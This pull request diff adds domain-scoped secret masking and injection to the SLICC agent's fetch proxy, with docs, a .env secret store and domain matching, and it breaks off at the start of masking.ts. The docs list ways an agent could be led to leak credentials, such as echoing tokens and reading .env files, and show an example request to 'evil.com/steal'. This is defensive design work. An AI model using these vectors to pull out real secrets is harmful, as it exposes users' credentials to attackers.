### PR TITLE
feat: Keychain Secrets API — domain-scoped secret injection for agent safety

### DIFF
--- a/README.md
+++ b/README.md
@@ -155,6 +155,12 @@ To use SLICC, you need an LLM provider. SLICC is very much a BYOT (bring your ow
 
 The other providers are in YMMV territory. Please file an issue if you find them working or broken.
 
+## Secrets
+
+SLICC can safely manage API keys, tokens, and credentials with domain-scoped injection. The agent never sees real secret values — only masked placeholders — and secrets are only injected into requests destined for authorized domains. This protects against prompt-injection attacks that try to exfiltrate credentials.
+
+See [docs/secrets.md](docs/secrets.md) for setup instructions.
+
 ## Related projects and lineage
 
 SLICC is part of the [AI Ecoverse](https://github.com/ai-ecoverse), a growing set of AI-native tools and workflows. Its distinctive angle is simple: browser-native, practical, and job-oriented.
@@ -173,5 +179,6 @@ If you want to go deeper, the detailed docs live here:
 - [Architecture](docs/architecture.md)
 - [Testing](docs/testing.md)
 - [Shell reference](docs/shell-reference.md)
+- [Secrets](docs/secrets.md)
 - [Adding features](docs/adding-features.md)
 - [Electron notes](docs/electron.md)

--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -405,6 +405,47 @@ Scoop removal / app clear
 | `agent-sessions`       | 1       | sessions                                                      | Core agent session history: persisted `SessionData` (`AgentMessage[]` + config + timestamps) per scoop, keyed by JID; loaded on scoop init, saved on agent_end |
 | `slicc-fs-global`      | 1       | config                                                        | Git global config storage                                                                                                                                      |
 
+## Secrets & Secret Injection
+
+SLICC prevents the agent from seeing or exfiltrating real secret values (API keys, tokens, credentials). Secrets are stored server-side and injected at the fetch-proxy boundary, scoped to authorized domains only.
+
+### Masking Engine
+
+Each secret is masked using `HMAC-SHA256(session_id + secret_name, secret_value)`. The result is format-preserving — known prefixes like `ghp_`, `sk-`, `AKIA` are kept, and the hash portion matches the original value's length and character set. Masks are deterministic within a session (the agent can compare values) but differ across sessions (no lookup-table attacks).
+
+### Scrubbing Pipeline
+
+Real secret values are scrubbed at every output boundary before reaching the agent:
+
+1. **Shell environment** — env vars contain masked values, not real ones
+2. **Tool output** — all `bash`, `read_file`, and other tool results are scanned for real values and replaced with masks
+3. **Fetch proxy (outbound)** — masked values in request headers are unmasked if the domain matches; 403 if not. Masked values in request bodies are unmasked for matching domains and passed through unchanged otherwise
+4. **Fetch proxy (inbound)** — response bodies and headers are scanned for real values and replaced with masks
+5. **Chat messages** — user-typed real values are scrubbed before entering the agent conversation
+
+### Storage Backends
+
+| Backend        | Runtime                     | Storage                                                        | Encryption                           |
+| -------------- | --------------------------- | -------------------------------------------------------------- | ------------------------------------ |
+| macOS Keychain | swift-server                | `SecItemAdd`/`SecItemCopyMatching`, service `ai.sliccy.slicc`  | Login keychain (encrypted at rest)   |
+| `.env` file    | node-server (all platforms) | `~/.slicc/secrets.env`, `KEY=VALUE` + `KEY_DOMAINS=...` format | Filesystem permissions (`chmod 600`) |
+
+Both implement the same `SecretStore` interface: `get(name)`, `set(name, value, config)`, `delete(name)`, `list()`.
+
+File path resolution: `--env-file <path>` CLI flag → `SLICC_SECRETS_FILE` env var → `~/.slicc/secrets.env`.
+
+### Key Source Files
+
+| File                                                                | Purpose                                                        |
+| ------------------------------------------------------------------- | -------------------------------------------------------------- |
+| `packages/node-server/src/secrets/`                                 | Node `.env` SecretStore, masking engine, domain matching       |
+| `packages/swift-server/Sources/`                                    | Swift Keychain SecretStore, masking engine                     |
+| `packages/node-server/src/index.ts`                                 | Fetch proxy secret injection (node-server)                     |
+| `packages/webapp/src/shell/supplemental-commands/secret-command.ts` | `secret` shell command                                         |
+| `packages/webapp/src/scoops/scoop-context.ts`                       | Shell env population with masked values, tool output scrubbing |
+
+See [docs/secrets.md](secrets.md) for user-facing setup instructions.
+
 ## File-Finding Guide
 
 ### Virtual Filesystem Changes

--- a/docs/secrets.md
+++ b/docs/secrets.md
@@ -1,0 +1,124 @@
+# Secrets
+
+SLICC can manage API keys, tokens, and credentials on your behalf — injecting them into HTTP requests without the agent ever seeing the real values. This prevents prompt-injection attacks from tricking the agent into exfiltrating your secrets.
+
+## How it works
+
+1. You store a secret (e.g. `GITHUB_TOKEN`) with a list of allowed domains (e.g. `api.github.com`).
+2. The agent sees a **masked value** — a deterministic hash that looks like a real token but isn't. The mask changes every session.
+3. When the agent makes an HTTP request through the fetch proxy, the server replaces the masked value with the real one — but **only if the destination domain is in the allowlist**.
+4. Responses from upstream APIs are scrubbed: any real secret values echoed back are replaced with the masked value before the agent sees them.
+
+The agent can use `$GITHUB_TOKEN` in shell commands and `curl` headers exactly as if it were real. It just never learns the actual value.
+
+## Adding secrets
+
+### Option 1: `.env` file (all platforms, node-server)
+
+Create `~/.slicc/secrets.env`:
+
+```env
+GITHUB_TOKEN=ghp_abc123...
+GITHUB_TOKEN_DOMAINS=api.github.com,*.github.com
+
+OPENAI_KEY=sk-xyz...
+OPENAI_KEY_DOMAINS=api.openai.com
+```
+
+Each secret needs two lines: `NAME=value` and `NAME_DOMAINS=domain1,domain2`. A secret without a `_DOMAINS` entry is rejected — every secret must be domain-scoped.
+
+Set file permissions: `chmod 600 ~/.slicc/secrets.env`.
+
+To use a different file path, pass `--env-file <path>` when starting SLICC, or set `SLICC_SECRETS_FILE` in your environment.
+
+### Option 2: macOS Keychain (swift-server)
+
+```bash
+security add-generic-password \
+  -s "ai.sliccy.slicc" \
+  -a "GITHUB_TOKEN" \
+  -w "ghp_abc123..." \
+  -j "api.github.com,*.github.com" \
+  -U
+```
+
+- `-s` — service name (always `ai.sliccy.slicc`)
+- `-a` — secret name (becomes the env var name)
+- `-w` — secret value
+- `-j` — comma-separated domain allowlist (stored in the comment field)
+- `-U` — update if the item already exists
+
+The swift-server also supports `--env-file` for loading additional secrets from a `.env` file alongside Keychain secrets.
+
+## The `secret` shell command
+
+Inside the SLICC shell, the `secret` command manages secrets:
+
+| Command                    | Description                                                  |
+| -------------------------- | ------------------------------------------------------------ |
+| `secret list`              | Show configured secrets (names and domains, never values)    |
+| `secret set <name>`        | Show instructions for adding a secret via Keychain or `.env` |
+| `secret delete <name>`     | Show instructions for removing a secret                      |
+| `secret test <name> <url>` | Check whether a secret would be injected for a given URL     |
+
+`secret test` is useful for verifying domain restrictions before making real requests:
+
+```bash
+$ secret test GITHUB_TOKEN https://api.github.com/repos/foo/bar
+✅ GITHUB_TOKEN is allowed for api.github.com
+
+$ secret test GITHUB_TOKEN https://evil.com/steal
+❌ GITHUB_TOKEN is NOT allowed for evil.com
+```
+
+## Domain restrictions
+
+Each secret has a list of glob patterns controlling where it can be injected:
+
+| Pattern          | Matches                                                                 |
+| ---------------- | ----------------------------------------------------------------------- |
+| `api.github.com` | Exact match only                                                        |
+| `*.github.com`   | Any subdomain of `github.com` (e.g. `api.github.com`, `raw.github.com`) |
+| `*`              | Any domain (use with caution)                                           |
+
+A secret is only unmasked in a request if the target URL's hostname matches at least one pattern.
+
+## How the fetch proxy works
+
+All HTTP requests from the agent route through a server-side fetch proxy (`/api/fetch-proxy`). The proxy handles secrets in both directions:
+
+**Outbound (request):**
+
+- Scans request **headers** for masked values. If a masked value is found and the domain matches → unmask (replace with real value). If the domain doesn't match → **403 reject**.
+- Scans request **body** for masked values. If the domain matches → unmask. If the domain doesn't match → **pass through unchanged** (the masked value is harmless, and blocking would break the agent's own LLM API calls which naturally contain masked values in conversation context).
+
+**Inbound (response):**
+
+- Scans response headers and body for real secret values and replaces them with masked equivalents before forwarding to the agent.
+
+## Covered extraction vectors
+
+The secrets system defends against multiple exfiltration paths:
+
+| Vector                                      | Mitigation                                                   |
+| ------------------------------------------- | ------------------------------------------------------------ |
+| HTTP requests (`curl`, `fetch`)             | Fetch proxy with domain-scoped injection                     |
+| Environment variables (`echo $TOKEN`)       | Shell env contains masked values, not real ones              |
+| File reads (`cat ~/.env`)                   | Tool output scrubbed before reaching agent                   |
+| Shell output (any command stdout/stderr)    | All bash tool output scrubbed                                |
+| Git operations (`git diff`, `git log -p`)   | Output goes through bash scrubbing                           |
+| Response echo-back (API returns your token) | Response body/headers scrubbed by fetch proxy                |
+| Browser automation (CDP `evaluate`)         | Agent only has masked values; can't construct real requests  |
+| Redirect URLs (secret in query params)      | Fetch proxy follows redirects server-side; URL never exposed |
+
+## Extension mode
+
+In Chrome extension mode, there is no server-side fetch proxy. Secrets require a CLI or desktop backend (node-server or swift-server). When no backend is available, the agent is informed that secrets are unavailable.
+
+## Platform support
+
+| Runtime      | macOS                      | Windows                    | Linux                      |
+| ------------ | -------------------------- | -------------------------- | -------------------------- |
+| swift-server | ✅ Keychain + `.env`       | —                          | —                          |
+| node-server  | ✅ `.env`                  | ✅ `.env`                  | ✅ `.env`                  |
+| extension    | ⚠️ Requires server backend | ⚠️ Requires server backend | ⚠️ Requires server backend |

--- a/docs/shell-reference.md
+++ b/docs/shell-reference.md
@@ -42,6 +42,7 @@ Custom commands implemented in TypeScript and registered in just-bash.
 | **debug**                                   | `debug-command.ts`         | Toggle Terminal/Memory tabs in extension mode                                                                                               | `debug on`, `debug off`, no args = show state; extension-only (not registered in CLI)                                                       |
 | **cost**                                    | `cost-command.ts`          | Show session cost breakdown per scoop/cone                                                                                                  | `--json`, `-h`                                                                                                                              |
 | **models**                                  | `models-command.ts`        | List available LLM models with pricing and benchmarks                                                                                       | `--all`, `--json`, `--provider <id>`, `--refresh`                                                                                           |
+| **secret**                                  | `secret-command.ts`        | Manage secrets (API keys, tokens) with domain-scoped injection                                                                              | `list`, `set <name>`, `delete <name>`, `test <name> <url>`                                                                                  |
 | **git**                                     | (isomorphic-git)           | Full git support                                                                                                                            | `git clone`, `git commit`, `git push`, etc.                                                                                                 |
 
 **Example usage**:
@@ -592,6 +593,15 @@ console.log(files);
 
 # Schedule a task
 crontask add "cleanup" "0 3 * * 0" cleaner-scoop "Remove old files from /tmp"
+
+# List configured secrets (names + domains, never values)
+secret list
+
+# Check if a secret would be injected for a URL
+secret test GITHUB_TOKEN https://api.github.com/repos/foo/bar
+
+# Show instructions for adding a new secret
+secret set API_KEY
 ```
 
 ---

--- a/packages/node-server/src/index.ts
+++ b/packages/node-server/src/index.ts
@@ -952,6 +952,21 @@ async function main() {
         .json({ error: err instanceof Error ? err.message : 'Failed to delete secret' });
     }
   });
+
+  // Masked secrets endpoint — returns name + maskedValue pairs for shell env population.
+  // The browser fetches this at shell init to populate env vars with masked values.
+  // Real values are never exposed; only deterministic session-scoped masks.
+  app.get('/api/secrets/masked', (_req, res) => {
+    try {
+      const entries = secretProxy.getMaskedEntries();
+      res.json(entries);
+    } catch (err) {
+      res
+        .status(500)
+        .json({ error: err instanceof Error ? err.message : 'Failed to get masked secrets' });
+    }
+  });
+
   // Fetch proxy — forwards cross-origin requests from the browser to bypass CORS.
   // Used by just-bash's curl which calls the browser's fetch() API.
   // Note: express.json() may have already parsed the body, so we check req.body first.

--- a/packages/node-server/src/index.ts
+++ b/packages/node-server/src/index.ts
@@ -1094,15 +1094,13 @@ async function main() {
       if (Object.keys(headers).length > 0) fetchInit.headers = headers;
       if (rawBody.length > 0 && !['GET', 'HEAD'].includes(req.method)) {
         // --- Secret injection: unmask request body ---
+        // Body uses unmaskBody: domain mismatches leave the masked value as-is
+        // (safe/meaningless) rather than rejecting. This avoids false 403s when
+        // LLM conversation context contains masked secrets sent to non-matching
+        // domains like Bedrock.
         if (secretProxy.hasSecrets()) {
           const bodyStr = rawBody.toString('utf-8');
-          const bodyResult = secretProxy.unmask(bodyStr, targetHostname);
-          if (bodyResult.forbidden) {
-            res.status(403).json({
-              error: `Secret "${bodyResult.forbidden.secretName}" is not allowed for domain "${bodyResult.forbidden.hostname}"`,
-            });
-            return;
-          }
+          const bodyResult = secretProxy.unmaskBody(bodyStr, targetHostname);
           rawBody = Buffer.from(bodyResult.text, 'utf-8');
         }
         // Buffer extends Uint8Array which is a valid fetch body at runtime.

--- a/packages/node-server/src/index.ts
+++ b/packages/node-server/src/index.ts
@@ -24,6 +24,7 @@ import { resolveCliBrowserLaunchUrl } from './launch-url.js';
 import { parseCliRuntimeFlags } from './runtime-flags.js';
 import { FileLogger } from './file-logger.js';
 import { CliLogDedup } from './cli-log-dedup.js';
+import { EnvSecretStore } from './secrets/env-secret-store.js';
 import { SecretProxyManager } from './secrets/proxy-manager.js';
 
 const __dirname = fileURLToPath(new URL('.', import.meta.url));
@@ -904,6 +905,53 @@ async function main() {
     res.json({ ok: true });
   });
 
+  // Secret management API — direct .env file access (no browser needed)
+  const secretStore = new EnvSecretStore();
+
+  app.get('/api/secrets', (_req, res) => {
+    try {
+      const entries = secretStore.list();
+      res.json(entries);
+    } catch (err) {
+      res
+        .status(500)
+        .json({ error: err instanceof Error ? err.message : 'Failed to list secrets' });
+    }
+  });
+
+  app.post('/api/secrets', (req, res) => {
+    const { name, value, domains } = req.body as {
+      name?: string;
+      value?: string;
+      domains?: string[];
+    };
+    if (!name || typeof name !== 'string') {
+      res.status(400).json({ error: 'Missing required field: name' });
+      return;
+    }
+    if (value === undefined || value === null || typeof value !== 'string') {
+      res.status(400).json({ error: 'Missing required field: value' });
+      return;
+    }
+    try {
+      secretStore.set(name, value, Array.isArray(domains) ? domains : []);
+      res.json({ ok: true, name });
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      res.status(msg.includes('at least one') ? 400 : 500).json({ error: msg });
+    }
+  });
+
+  app.delete('/api/secrets/:name', (req, res) => {
+    try {
+      secretStore.delete(req.params.name);
+      res.json({ ok: true, name: req.params.name });
+    } catch (err) {
+      res
+        .status(500)
+        .json({ error: err instanceof Error ? err.message : 'Failed to delete secret' });
+    }
+  });
   // Fetch proxy — forwards cross-origin requests from the browser to bypass CORS.
   // Used by just-bash's curl which calls the browser's fetch() API.
   // Note: express.json() may have already parsed the body, so we check req.body first.
@@ -1002,8 +1050,40 @@ async function main() {
       // Without this, Cloudflare may Brotli-compress the response, the proxy strips
       // Content-Encoding (line below), and the browser receives compressed garbage.
       headers['accept-encoding'] = 'identity';
+
+      // --- Secret injection: unmask headers ---
+      let targetHostname: string;
+      try {
+        targetHostname = new URL(targetUrl).hostname;
+      } catch {
+        targetHostname = '';
+      }
+
+      if (secretProxy.hasSecrets()) {
+        // Unmask request headers (replace masked values with real, validate domain)
+        const headerResult = secretProxy.unmaskHeaders(headers, targetHostname);
+        if (headerResult.forbidden) {
+          res.status(403).json({
+            error: `Secret "${headerResult.forbidden.secretName}" is not allowed for domain "${headerResult.forbidden.hostname}"`,
+          });
+          return;
+        }
+      }
+
       if (Object.keys(headers).length > 0) fetchInit.headers = headers;
       if (rawBody.length > 0 && !['GET', 'HEAD'].includes(req.method)) {
+        // --- Secret injection: unmask request body ---
+        if (secretProxy.hasSecrets()) {
+          const bodyStr = rawBody.toString('utf-8');
+          const bodyResult = secretProxy.unmask(bodyStr, targetHostname);
+          if (bodyResult.forbidden) {
+            res.status(403).json({
+              error: `Secret "${bodyResult.forbidden.secretName}" is not allowed for domain "${bodyResult.forbidden.hostname}"`,
+            });
+            return;
+          }
+          rawBody = Buffer.from(bodyResult.text, 'utf-8');
+        }
         // Buffer extends Uint8Array which is a valid fetch body at runtime.
         fetchInit.body = rawBody as unknown as RequestInit['body'];
       }
@@ -1030,17 +1110,24 @@ async function main() {
           lower !== 'set-cookie' &&
           !lower.startsWith('x-proxy-')
         ) {
-          res.setHeader(k, v);
+          // Scrub real secret values from response headers
+          res.setHeader(k, secretProxy.scrubResponse(v));
         }
       });
       if (setCookieValues.length > 0) {
-        res.setHeader('X-Proxy-Set-Cookie', JSON.stringify(setCookieValues));
+        res.setHeader(
+          'X-Proxy-Set-Cookie',
+          secretProxy.scrubResponse(JSON.stringify(setCookieValues))
+        );
       }
 
-      // Send body as raw binary - explicitly set content-length and use end()
-      // instead of send() to avoid any Express middleware transformations
+      // Send body — scrub real secret values from response body
       const body = await upstream.arrayBuffer();
-      const buffer = Buffer.from(body);
+      let buffer = Buffer.from(body);
+      if (secretProxy.hasSecrets()) {
+        const scrubbed = secretProxy.scrubResponse(buffer.toString('utf-8'));
+        buffer = Buffer.from(scrubbed, 'utf-8');
+      }
       res.setHeader('Content-Length', buffer.length);
       res.end(buffer);
     } catch (err: unknown) {

--- a/packages/node-server/src/index.ts
+++ b/packages/node-server/src/index.ts
@@ -919,46 +919,6 @@ async function main() {
     }
   });
 
-  app.post('/api/secrets', async (req, res) => {
-    const { name, value, domains } = req.body as {
-      name?: string;
-      value?: string;
-      domains?: string[];
-    };
-    if (!name || typeof name !== 'string') {
-      res.status(400).json({ error: 'Missing required field: name' });
-      return;
-    }
-    if (value === undefined || value === null || typeof value !== 'string') {
-      res.status(400).json({ error: 'Missing required field: value' });
-      return;
-    }
-    if (value.trim().length === 0) {
-      res.status(400).json({ error: 'Secret value must not be empty' });
-      return;
-    }
-    try {
-      secretStore.set(name, value, Array.isArray(domains) ? domains : []);
-      await secretProxy.reload();
-      res.json({ ok: true, name });
-    } catch (err) {
-      const msg = err instanceof Error ? err.message : String(err);
-      res.status(msg.includes('at least one') ? 400 : 500).json({ error: msg });
-    }
-  });
-
-  app.delete('/api/secrets/:name', async (req, res) => {
-    try {
-      secretStore.delete(req.params.name);
-      await secretProxy.reload();
-      res.json({ ok: true, name: req.params.name });
-    } catch (err) {
-      res
-        .status(500)
-        .json({ error: err instanceof Error ? err.message : 'Failed to delete secret' });
-    }
-  });
-
   // Masked secrets endpoint — returns name + maskedValue pairs for shell env population.
   // The browser fetches this at shell init to populate env vars with masked values.
   // Real values are never exposed; only deterministic session-scoped masks.

--- a/packages/node-server/src/index.ts
+++ b/packages/node-server/src/index.ts
@@ -906,7 +906,7 @@ async function main() {
   });
 
   // Secret management API — direct .env file access (no browser needed)
-  const secretStore = new EnvSecretStore();
+  const secretStore = new EnvSecretStore(RUNTIME_FLAGS.envFile ?? undefined);
 
   app.get('/api/secrets', (_req, res) => {
     try {

--- a/packages/node-server/src/index.ts
+++ b/packages/node-server/src/index.ts
@@ -24,6 +24,7 @@ import { resolveCliBrowserLaunchUrl } from './launch-url.js';
 import { parseCliRuntimeFlags } from './runtime-flags.js';
 import { FileLogger } from './file-logger.js';
 import { CliLogDedup } from './cli-log-dedup.js';
+import { SecretProxyManager } from './secrets/proxy-manager.js';
 
 const __dirname = fileURLToPath(new URL('.', import.meta.url));
 const PROJECT_ROOT = resolve(__dirname, '..', '..');
@@ -586,6 +587,18 @@ async function main() {
   }
 
   // 3. Set up express app with request logging
+  const secretProxy = new SecretProxyManager();
+  try {
+    await secretProxy.reload();
+    if (secretProxy.hasSecrets()) {
+      console.log(
+        `Loaded ${secretProxy.getMaskedEntries().length} secrets for fetch-proxy injection`
+      );
+    }
+  } catch (err) {
+    console.warn('Failed to load secrets:', err instanceof Error ? err.message : err);
+  }
+
   const app = express();
   app.use(requestLogger);
 

--- a/packages/node-server/src/index.ts
+++ b/packages/node-server/src/index.ts
@@ -919,7 +919,7 @@ async function main() {
     }
   });
 
-  app.post('/api/secrets', (req, res) => {
+  app.post('/api/secrets', async (req, res) => {
     const { name, value, domains } = req.body as {
       name?: string;
       value?: string;
@@ -933,8 +933,13 @@ async function main() {
       res.status(400).json({ error: 'Missing required field: value' });
       return;
     }
+    if (value.trim().length === 0) {
+      res.status(400).json({ error: 'Secret value must not be empty' });
+      return;
+    }
     try {
       secretStore.set(name, value, Array.isArray(domains) ? domains : []);
+      await secretProxy.reload();
       res.json({ ok: true, name });
     } catch (err) {
       const msg = err instanceof Error ? err.message : String(err);
@@ -942,9 +947,10 @@ async function main() {
     }
   });
 
-  app.delete('/api/secrets/:name', (req, res) => {
+  app.delete('/api/secrets/:name', async (req, res) => {
     try {
       secretStore.delete(req.params.name);
+      await secretProxy.reload();
       res.json({ ok: true, name: req.params.name });
     } catch (err) {
       res
@@ -1136,12 +1142,17 @@ async function main() {
         );
       }
 
-      // Send body — scrub real secret values from response body
+      // Send body — scrub real secret values from response body (text-only)
       const body = await upstream.arrayBuffer();
       let buffer = Buffer.from(body);
       if (secretProxy.hasSecrets()) {
-        const scrubbed = secretProxy.scrubResponse(buffer.toString('utf-8'));
-        buffer = Buffer.from(scrubbed, 'utf-8');
+        const ct = (upstream.headers.get('content-type') ?? '').toLowerCase();
+        const isText =
+          ct.startsWith('text/') || ct.startsWith('application/json') || ct.includes('charset=');
+        if (isText) {
+          const scrubbed = secretProxy.scrubResponse(buffer.toString('utf-8'));
+          buffer = Buffer.from(scrubbed, 'utf-8');
+        }
       }
       res.setHeader('Content-Length', buffer.length);
       res.end(buffer);

--- a/packages/node-server/src/runtime-flags.ts
+++ b/packages/node-server/src/runtime-flags.ts
@@ -18,6 +18,8 @@ export interface CliRuntimeFlags {
   logDir: string | null;
   /** Initial prompt to auto-submit when the UI loads */
   prompt: string | null;
+  /** Path to a .env file for secrets */
+  envFile: string | null;
   version: boolean;
 }
 
@@ -46,6 +48,7 @@ export function parseCliRuntimeFlags(argv: string[]): CliRuntimeFlags {
   let logLevel: LogLevel = 'info';
   let logDir: string | null = null;
   let prompt: string | null = null;
+  let envFile: string | null = null;
   let version = false;
 
   for (let index = 0; index < argv.length; index += 1) {
@@ -90,6 +93,18 @@ export function parseCliRuntimeFlags(argv: string[]): CliRuntimeFlags {
       const nextArg = argv[index + 1];
       if (nextArg && !nextArg.startsWith('--')) {
         prompt = nextArg;
+        index += 1;
+      }
+      continue;
+    }
+    if (arg.startsWith('--env-file=')) {
+      envFile = arg.slice('--env-file='.length) || null;
+      continue;
+    }
+    if (arg === '--env-file') {
+      const nextArg = argv[index + 1];
+      if (nextArg && !nextArg.startsWith('--')) {
+        envFile = nextArg;
         index += 1;
       }
       continue;
@@ -186,6 +201,7 @@ export function parseCliRuntimeFlags(argv: string[]): CliRuntimeFlags {
     logLevel,
     logDir,
     prompt,
+    envFile,
     version,
   };
 }

--- a/packages/node-server/src/secrets/domain-match.ts
+++ b/packages/node-server/src/secrets/domain-match.ts
@@ -1,0 +1,41 @@
+/**
+ * Domain glob matching for secret domain allowlists.
+ *
+ * Supports patterns like:
+ * - `api.github.com` — exact match
+ * - `*.github.com`   — matches any subdomain of github.com
+ * - `*`              — matches any domain
+ */
+
+/**
+ * Check if a hostname matches a domain glob pattern.
+ *
+ * @param hostname - The hostname to check (e.g., "api.github.com")
+ * @param pattern  - The glob pattern (e.g., "*.github.com")
+ * @returns true if the hostname matches the pattern
+ */
+export function matchDomain(hostname: string, pattern: string): boolean {
+  const h = hostname.toLowerCase();
+  const p = pattern.toLowerCase();
+
+  // Wildcard matches everything
+  if (p === '*') return true;
+
+  // Exact match
+  if (h === p) return true;
+
+  // Glob match: *.example.com matches sub.example.com but not example.com
+  if (p.startsWith('*.')) {
+    const suffix = p.slice(1); // ".example.com"
+    return h.endsWith(suffix) && h.length > suffix.length;
+  }
+
+  return false;
+}
+
+/**
+ * Check if a hostname matches any pattern in a list of domain globs.
+ */
+export function matchesDomains(hostname: string, patterns: string[]): boolean {
+  return patterns.some((pattern) => matchDomain(hostname, pattern));
+}

--- a/packages/node-server/src/secrets/env-file.ts
+++ b/packages/node-server/src/secrets/env-file.ts
@@ -5,7 +5,7 @@
  * - KEY=VALUE lines (no quoting required)
  * - Single- and double-quoted values (quotes stripped)
  * - Comment lines starting with #
- * - Blank lines preserved on round-trip
+ * - Blank lines and comments are stripped on round-trip
  */
 
 export interface EnvEntry {

--- a/packages/node-server/src/secrets/env-file.ts
+++ b/packages/node-server/src/secrets/env-file.ts
@@ -1,0 +1,59 @@
+/**
+ * Simple .env parser and writer — no external dependencies.
+ *
+ * Supports:
+ * - KEY=VALUE lines (no quoting required)
+ * - Single- and double-quoted values (quotes stripped)
+ * - Comment lines starting with #
+ * - Blank lines preserved on round-trip
+ */
+
+export interface EnvEntry {
+  key: string;
+  value: string;
+}
+
+/**
+ * Parse .env file content into key-value pairs.
+ * Blank lines and comments are skipped.
+ */
+export function parseEnvFile(content: string): EnvEntry[] {
+  const entries: EnvEntry[] = [];
+  for (const raw of content.split('\n')) {
+    const line = raw.trim();
+    if (line === '' || line.startsWith('#')) continue;
+
+    const eqIndex = line.indexOf('=');
+    if (eqIndex === -1) continue; // malformed line, skip
+
+    const key = line.slice(0, eqIndex).trim();
+    let value = line.slice(eqIndex + 1).trim();
+
+    // Strip matching quotes
+    if (
+      (value.startsWith('"') && value.endsWith('"')) ||
+      (value.startsWith("'") && value.endsWith("'"))
+    ) {
+      value = value.slice(1, -1);
+    }
+
+    if (key) {
+      entries.push({ key, value });
+    }
+  }
+  return entries;
+}
+
+/**
+ * Serialize key-value pairs back to .env format.
+ * Values containing spaces, #, or quotes are double-quoted.
+ */
+export function serializeEnvFile(entries: EnvEntry[]): string {
+  const lines: string[] = [];
+  for (const { key, value } of entries) {
+    const needsQuoting = /[\s#"']/.test(value);
+    const serialized = needsQuoting ? `"${value.replace(/"/g, '\\"')}"` : value;
+    lines.push(`${key}=${serialized}`);
+  }
+  return lines.join('\n') + '\n';
+}

--- a/packages/node-server/src/secrets/env-secret-store.ts
+++ b/packages/node-server/src/secrets/env-secret-store.ts
@@ -1,0 +1,118 @@
+/**
+ * SecretStore implementation backed by a .env file.
+ *
+ * Default location: ~/.slicc/secrets.env
+ * Override via SLICC_SECRETS_FILE env var or --secrets-file flag.
+ *
+ * File is created with mode 0600 if it doesn't exist.
+ */
+
+import { readFileSync, writeFileSync, mkdirSync, existsSync, chmodSync } from 'node:fs';
+import { dirname, resolve } from 'node:path';
+import { homedir } from 'node:os';
+import { parseEnvFile, serializeEnvFile, type EnvEntry } from './env-file.js';
+import type { Secret, SecretEntry, SecretStore } from './types.js';
+
+const DOMAINS_SUFFIX = '_DOMAINS';
+const DEFAULT_PATH = resolve(homedir(), '.slicc', 'secrets.env');
+const FILE_MODE = 0o600;
+
+export class EnvSecretStore implements SecretStore {
+  private readonly filePath: string;
+
+  constructor(filePath?: string) {
+    this.filePath = filePath ?? process.env['SLICC_SECRETS_FILE'] ?? DEFAULT_PATH;
+  }
+
+  get(name: string): Secret | null {
+    const entries = this.readEntries();
+    const valueEntry = entries.find((e) => e.key === name);
+    const domainsEntry = entries.find((e) => e.key === name + DOMAINS_SUFFIX);
+
+    if (!valueEntry || !domainsEntry) return null;
+
+    const domains = parseDomains(domainsEntry.value);
+    if (domains.length === 0) return null;
+
+    return { name, value: valueEntry.value, domains };
+  }
+
+  set(name: string, value: string, domains: string[]): void {
+    if (domains.length === 0) {
+      throw new Error(`Secret "${name}" must have at least one authorized domain`);
+    }
+
+    const entries = this.readEntries();
+    const domainsKey = name + DOMAINS_SUFFIX;
+
+    upsertEntry(entries, name, value);
+    upsertEntry(entries, domainsKey, domains.join(','));
+
+    this.writeEntries(entries);
+  }
+
+  delete(name: string): void {
+    const entries = this.readEntries();
+    const domainsKey = name + DOMAINS_SUFFIX;
+    const filtered = entries.filter((e) => e.key !== name && e.key !== domainsKey);
+    this.writeEntries(filtered);
+  }
+
+  list(): SecretEntry[] {
+    const entries = this.readEntries();
+    const result: SecretEntry[] = [];
+
+    for (const entry of entries) {
+      if (entry.key.endsWith(DOMAINS_SUFFIX)) continue;
+
+      const domainsEntry = entries.find((e) => e.key === entry.key + DOMAINS_SUFFIX);
+      if (!domainsEntry) continue; // no _DOMAINS → skip (rejected)
+
+      const domains = parseDomains(domainsEntry.value);
+      if (domains.length > 0) {
+        result.push({ name: entry.key, domains });
+      }
+    }
+
+    return result;
+  }
+
+  // -- internal helpers --
+
+  private readEntries(): EnvEntry[] {
+    if (!existsSync(this.filePath)) return [];
+    const content = readFileSync(this.filePath, 'utf-8');
+    return parseEnvFile(content);
+  }
+
+  private writeEntries(entries: EnvEntry[]): void {
+    const dir = dirname(this.filePath);
+    if (!existsSync(dir)) {
+      mkdirSync(dir, { recursive: true });
+    }
+    const content = serializeEnvFile(entries);
+    writeFileSync(this.filePath, content, { mode: FILE_MODE });
+    // Ensure permissions even if file already existed
+    try {
+      chmodSync(this.filePath, FILE_MODE);
+    } catch {
+      // chmod may fail on some platforms (Windows); best-effort
+    }
+  }
+}
+
+function parseDomains(value: string): string[] {
+  return value
+    .split(',')
+    .map((d) => d.trim())
+    .filter((d) => d.length > 0);
+}
+
+function upsertEntry(entries: EnvEntry[], key: string, value: string): void {
+  const idx = entries.findIndex((e) => e.key === key);
+  if (idx >= 0) {
+    entries[idx] = { key, value };
+  } else {
+    entries.push({ key, value });
+  }
+}

--- a/packages/node-server/src/secrets/env-secret-store.ts
+++ b/packages/node-server/src/secrets/env-secret-store.ts
@@ -2,7 +2,7 @@
  * SecretStore implementation backed by a .env file.
  *
  * Default location: ~/.slicc/secrets.env
- * Override via SLICC_SECRETS_FILE env var or --secrets-file flag.
+ * Override via SLICC_SECRETS_FILE env var.
  *
  * File is created with mode 0600 if it doesn't exist.
  */

--- a/packages/node-server/src/secrets/index.ts
+++ b/packages/node-server/src/secrets/index.ts
@@ -1,0 +1,4 @@
+export type { Secret, SecretEntry, SecretStore } from './types.js';
+export { EnvSecretStore } from './env-secret-store.js';
+export { matchDomain, matchesDomains } from './domain-match.js';
+export { parseEnvFile, serializeEnvFile } from './env-file.js';

--- a/packages/node-server/src/secrets/index.ts
+++ b/packages/node-server/src/secrets/index.ts
@@ -2,3 +2,4 @@ export type { Secret, SecretEntry, SecretStore } from './types.js';
 export { EnvSecretStore } from './env-secret-store.js';
 export { matchDomain, matchesDomains } from './domain-match.js';
 export { parseEnvFile, serializeEnvFile } from './env-file.js';
+export { SecretProxyManager, type MaskedSecret } from './proxy-manager.js';

--- a/packages/node-server/src/secrets/masking.ts
+++ b/packages/node-server/src/secrets/masking.ts
@@ -1,0 +1,110 @@
+/**
+ * Secret masking engine for the node-server fetch proxy.
+ *
+ * This is a Node-specific copy of the core masking logic from
+ * packages/webapp/src/core/secret-masking.ts. Both must stay in sync.
+ *
